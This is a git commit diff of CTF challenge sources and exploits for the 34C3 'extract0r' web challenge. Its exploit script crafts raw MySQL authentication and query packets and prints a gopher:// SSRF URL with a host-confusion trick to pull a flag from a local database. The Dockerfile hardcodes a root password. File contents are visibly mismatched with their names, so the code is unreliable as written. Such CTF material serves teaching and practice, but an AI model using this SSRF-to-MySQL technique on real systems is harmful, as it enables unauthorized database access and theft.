initial commit

Author: eboda

.gitignore

@@ -0,0 +1,3 @@
+*.pyc
+__pycache__
+*.sqlite3

README.md

@@ -1,2 +1,14 @@
-# 34c3ctf
-Challenge Sources & Exploits for the 34C3 CTF
+# Challenge Sources & Exploits for the 34C3 CTF
+
+Challenges:
+
+* minbashmaxfun - misc 
+* urlstorage - web 
+* extract0r - web
+
+Junior Challenges:
+* cyberms - crypto
+* megalal - crypto
+* babybash - misc
+* pizzagate - web
+* quaker - web

extract0r/000-default.conf

@@ -0,0 +1,59 @@
+<VirtualHost *:80>
+        # The ServerName directive sets the request scheme, hostname and port that
+        # the server uses to identify itself. This is used when creating
+        # redirection URLs. In the context of virtual hosts, the ServerName
+        # specifies what hostname must appear in the request's Host: header to
+        # match this virtual host. For the default virtual host (this file) this
+        # value is not decisive as it is used as a last resort host regardless.
+        # However, you must set it for any further virtual host explicitly.
+        #ServerName www.example.com
+
+
+        ServerAdmin webmaster@localhost
+        DocumentRoot /var/www/html
+        php_admin_flag engine off
+
+        <Location /index.php>
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine on
+        </Location>
+
+        <Directory /var/www/html>
+            Options -Indexes 
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        <Directory /var/www/html/files/>
+            Options -Indexes 
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        <Directory /var/www/html/files/*/>
+            Options Indexes FollowSymLinks
+            AllowOverride None
+            Require all granted
+            php_admin_flag engine off
+        </Directory>
+
+        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
+        # error, crit, alert, emerg.
+        # It is also possible to configure the loglevel for particular
+        # modules, e.g.
+        #LogLevel info ssl:warn
+
+        ErrorLog ${APACHE_LOG_DIR}/error.log
+        CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+        # For most configuration files from conf-available/, which are
+        # enabled or disabled at a global level, it is possible to
+        # include a line for only one particular virtual host. For example the
+        # following line enables the CGI configuration for this host only
+        # after it has been globally disabled with "a2disconf".
+        #Include conf-available/serve-cgi-bin.conf
+</VirtualHost>
+

extract0r/Dockerfile

@@ -0,0 +1,32 @@
+FROM ubuntu:17.10
+
+RUN bash -c "debconf-set-selections <<< 'mysql-server mysql-server/root_password password FUCKmyL1f3AZiwqecq'"
+RUN bash -c "debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password FUCKmyL1f3AZiwqecq'"
+
+RUN apt-get -y update && apt-get -y install curl wget zip 
+
+# apache & php & stuff
+RUN apt-get -y install apache2 apt-transport-https curl wget zip php php-curl php-pclzip libapache2-mod-php mysql-server php-mysql p7zip-full vim-common cron
+
+ENV WEBROOT /var/www/html
+ENV MYSQL_USER=mysql
+RUN rm /var/www/html/index.html
+
+ADD mysqld.cnf /etc/mysql/mysql.conf.d/mysqld.cnf
+
+ADD dump.sql /tmp/
+RUN service mysql start; mysql -u root -pFUCKmyL1f3AZiwqecq < /tmp/dump.sql && rm /tmp/dump.sql
+
+# challenge files and configs
+RUN (crontab -l ; echo "*/5 * * * * rm -r /var/www/html/files/* ; touch /var/www/html/files/index.php";\
+        echo "*/5 * * * * rm -r /tmp/* && touch /tmp/index.php") | crontab -
+ADD 000-default.conf /etc/apache2/sites-enabled/000-default.conf
+ADD webroot/ /var/www/html/
+RUN touch /tmp/index.php
+RUN useradd extract0r -m
+ADD files/create_a_backup_of_my_supersecret_flag.sh /home/extract0r/
+RUN chown -R www-data /var/www/html/files && \
+    chown extract0r:extract0r /home/extract0r/create_a_backup_of_my_supersecret_flag.sh
+
+
+CMD service mysql start; service cron start; echo 'INSERT INTO flag.flag VALUES("34C3_you_Extr4cted_the_unExtract0ble_plUs_you_knoW_s0me_SSRF");' | mysql -u root -pFUCKmyL1f3AZiwqecq; service apache2 start;  /bin/bash

extract0r/README.md

@@ -0,0 +1,6 @@
+# extract0r - web - medium
+
+> Found this great new extraction service. Enjoy!
+
+> Difficulty: medium
+

extract0r/build_docker.sh

@@ -0,0 +1,2 @@
+#!/bin/bash
+docker build -t eboda/extract0r .

extract0r/dump.sql

@@ -0,0 +1,12 @@
+CREATE DATABASE  IF NOT EXISTS `flag` /*!40100 DEFAULT CHARACTER SET utf8 */;
+USE `flag`;
+
+DROP TABLE IF EXISTS `flag`;
+CREATE TABLE `flag` (
+  `flag` VARCHAR(100)
+);
+
+
+CREATE USER 'm4st3r_ov3rl0rd'@'localhost';
+GRANT USAGE ON *.* TO 'm4st3r_ov3rl0rd'@'localhost';
+GRANT SELECT ON `flag`.* TO 'm4st3r_ov3rl0rd'@'localhost';

extract0r/exploit/__init__.py

@@ -0,0 +1,51 @@
+#!/bin/bash
+
+import struct 
+import zip_tools
+from binascii import hexlify
+
+
+# make a 100 dummy character string
+# we will rpad flag to 100 characters (this is needed since actual flag length is unknown, you
+# could just bruteforce it tohugh i guess...)
+flag_dummy = b"B"*100
+
+payload = zip_tools.create_zip(b"gimme_flag", flag_dummy)
+# print(''.join(map(chr,payload)))
+# exit()
+
+prefix = bytes(payload.split(flag_dummy)[0])
+suffix = bytes(payload.split(flag_dummy)[1])
+
+
+sql_cmd = b"select concat(cast(0x" + hexlify(prefix) + b" as binary), rpad(flag, 100, 'A'), cast(0x" + hexlify(suffix) + b" as binary)) from flag.flag-- -"
+
+auth = bytearray([
+    0x48, 0x0, 0x0,     # length
+    0x1,                # seqid
+    0x85, 0xa6, 0x3f, 0x20, 0, 0, 0, 0x1, 0x21, 0, 0,
+    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
+    0, 0, 0, 0, 0
+] + list(b'm4st3r_ov3rl0rd') + [      # mysql user
+    0, 0,               # pass length & pass
+] + list(b'mysql_native_password') + [
+    0, 0,
+])
+
+
+def make_cmd(cmd):
+    length = struct.pack("<I", len(cmd) + 2)[:3]
+
+    return length + bytearray([
+        0x0,         # seqid
+        0x3,   # select query
+    ]) + cmd
+def encode(s):
+    return ''.join(map(lambda x: "%{:02x}".format(x), list(s)))
+
+
+print((b"gopher://foo@[cafebabe.cf]@yolo.com:3306/A" + bytes(encode(auth + make_cmd(sql_cmd) + b"FOOOOOOOOOOOOBAR"),"utf-8")).decode())
+
+
+
+

extract0r/exploit/exploit.py

@@ -0,0 +1,65 @@
+eocd_sig = b"\x50\x4b\x05\x06"
+cd_fh_sig = b"\x50\x4b\x01\x02"
+local_fh_sig = b"\x50\x4b\x03\x04"
+from struct import pack
+
+
+
+def create_zip(name, data):
+    local_fh = zip_local_fileheader(len(name), name, len(data), len(data), data)
+    cd_fh = zip_cd_fileheader(len(name), name, len(data), len(data), 0)
+    eocd = zip_eocd(len(local_fh) , len(cd_fh))
+    return local_fh + cd_fh + eocd
+
+
+def zip_eocd(cd_offset, cd_size, disk_no=0, disk_no_cd=0, disk_entries=1, total_entries=1, comment_len=0, comment=b""):
+    return eocd_sig + pack("<HHHHIIH",
+            disk_no,
+            disk_no_cd,
+            disk_entries,
+            total_entries,
+            cd_size,
+            cd_offset,
+            comment_len) + comment
+
+
+def zip_cd(list_file_headers):
+    res = "";
+    for file_header in list_file_headers:
+        res += file_header
+    return res
+
+
+def zip_cd_fileheader(file_name_len,file_name,compressed_size, uncompressed_size, local_header_offset,  version=0x31e, version_needed=0xa, flags=0, compression=0, crc32=0, modtime=0, moddate=0,  extra_field_len=0, file_comment_len=0, disk_start=0, internal_attr=0,external_attr=0, extra_field=b"", file_comment=b""):
+    return cd_fh_sig + pack("<HHHHHHIIIHHHHHII",
+            version,
+            version_needed,
+            flags,
+            compression,
+            modtime,
+            moddate,
+            crc32,
+            compressed_size,
+            uncompressed_size,
+            file_name_len,
+            extra_field_len,
+            file_comment_len,
+            disk_start,
+            internal_attr,
+            external_attr,
+            local_header_offset) + file_name + extra_field + file_comment
+
+def zip_local_fileheader(file_name_len, file_name, compressed_size, uncompressed_size, data, version=0xa, flags=0, compression=0, modtime=0, moddate=0, crc32=0, extra_field_len=0, extra_field=b""):
+        return local_fh_sig + pack("<HHHHHIIIHH",
+                version,
+                flags,
+                compression,
+                modtime,
+                moddate,
+                crc32,
+                compressed_size,
+                uncompressed_size,
+                file_name_len,
+                extra_field_len) + file_name + extra_field + data
+
+

extract0r/exploit/zip_tools.py

@@ -0,0 +1,25 @@
+#!/bin/sh
+echo "[+] Creating flag user and flag table."
+mysql -h 127.0.0.1 -uroot -p <<'SQL'
+CREATE DATABASE  IF NOT EXISTS `flag` /*!40100 DEFAULT CHARACTER SET utf8 */;
+USE `flag`;
+
+DROP TABLE IF EXISTS `flag`;
+CREATE TABLE `flag` (
+  `flag` VARCHAR(100)
+);
+
+
+CREATE USER 'm4st3r_ov3rl0rd'@'localhost';
+GRANT USAGE ON *.* TO 'm4st3r_ov3rl0rd'@'localhost';
+GRANT SELECT ON `flag`.* TO 'm4st3r_ov3rl0rd'@'localhost';
+SQL
+
+echo -n "[+] Please input the flag:"
+read flag
+
+mysql -h 127.0.0.1 -uroot -p <<SQL
+INSERT INTO flag.flag VALUES ('$flag');
+SQL
+
+echo "[+] Flag was succesfully backed up to mysql!"

extract0r/files/create_a_backup_of_my_supersecret_flag.sh

@@ -0,0 +1 @@
+34C3_you_Extr4cted_the_unExtract0ble_plUs_you_knoW_s0me_SSRF

extract0r/flag

@@ -0,0 +1,105 @@
+#
+# The MySQL database server configuration file.
+#
+# You can copy this to one of:
+# - "/etc/mysql/my.cnf" to set global options,
+# - "~/.my.cnf" to set user-specific options.
+# 
+# One can use all long options that the program supports.
+# Run program with --help to get a list of available options and with
+# --print-defaults to see which it would actually understand and use.
+#
+# For explanations see
+# http://dev.mysql.com/doc/mysql/en/server-system-variables.html
+
+# This will be passed to all mysql clients
+# It has been reported that passwords should be enclosed with ticks/quotes
+# escpecially if they contain "#" chars...
+# Remember to edit /etc/mysql/debian.cnf when changing the socket location.
+
+# Here is entries for some specific programs
+# The following values assume you have at least 32M ram
+
+[mysqld_safe]
+socket		= /var/run/mysqld/mysqld.sock
+nice		= 0
+
+[mysqld]
+#
+# * Basic Settings
+#
+user		= mysql
+pid-file	= /var/run/mysqld/mysqld.pid
+socket		= /var/run/mysqld/mysqld.sock
+port		= 3306
+basedir		= /usr
+datadir		= /var/lib/mysql
+tmpdir		= /tmp
+lc-messages-dir	= /usr/share/mysql
+skip-external-locking
+#
+# Instead of skip-networking the default is now to listen only on
+# localhost which is more compatible and is not less secure.
+bind-address		= 127.0.0.1
+#
+# * Fine Tuning
+#
+max_execution_time	= 100
+key_buffer_size		= 16M
+max_allowed_packet	= 16M
+thread_stack		= 192K
+thread_cache_size       = 8
+# This replaces the startup script and checks MyISAM tables if needed
+# the first time they are touched
+myisam-recover-options  = BACKUP
+#max_connections        = 100
+#table_cache            = 64
+#thread_concurrency     = 10
+#
+# * Query Cache Configuration
+#
+query_cache_limit	= 1M
+query_cache_size        = 16M
+#
+# * Logging and Replication
+#
+# Both location gets rotated by the cronjob.
+# Be aware that this log type is a performance killer.
+# As of 5.1 you can enable the log at runtime!
+#general_log_file        = /var/log/mysql/mysql.log
+#general_log             = 1
+#
+# Error log - should be very few entries.
+#
+log_error = /var/log/mysql/error.log
+#
+# Here you can see queries with especially long duration
+#log_slow_queries	= /var/log/mysql/mysql-slow.log
+#long_query_time = 2
+#log-queries-not-using-indexes
+#
+# The following can be used as easy to replay backup logs or for replication.
+# note: if you are setting up a replication slave, see README.Debian about
+#       other settings you may need to change.
+#server-id		= 1
+#log_bin			= /var/log/mysql/mysql-bin.log
+expire_logs_days	= 10
+max_binlog_size   = 100M
+#binlog_do_db		= include_database_name
+#binlog_ignore_db	= include_database_name
+#
+# * InnoDB
+#
+# InnoDB is enabled by default with a 10MB datafile in /var/lib/mysql/.
+# Read the manual for more InnoDB related options. There are many!
+#
+# * Security Features
+#
+# Read the manual, too, if you want chroot!
+# chroot = /var/lib/mysql/
+#
+# For generating SSL certificates I recommend the OpenSSL GUI "tinyca".
+#
+# ssl-ca=/etc/mysql/cacert.pem
+# ssl-cert=/etc/mysql/server-cert.pem
+# ssl-key=/etc/mysql/server-key.pem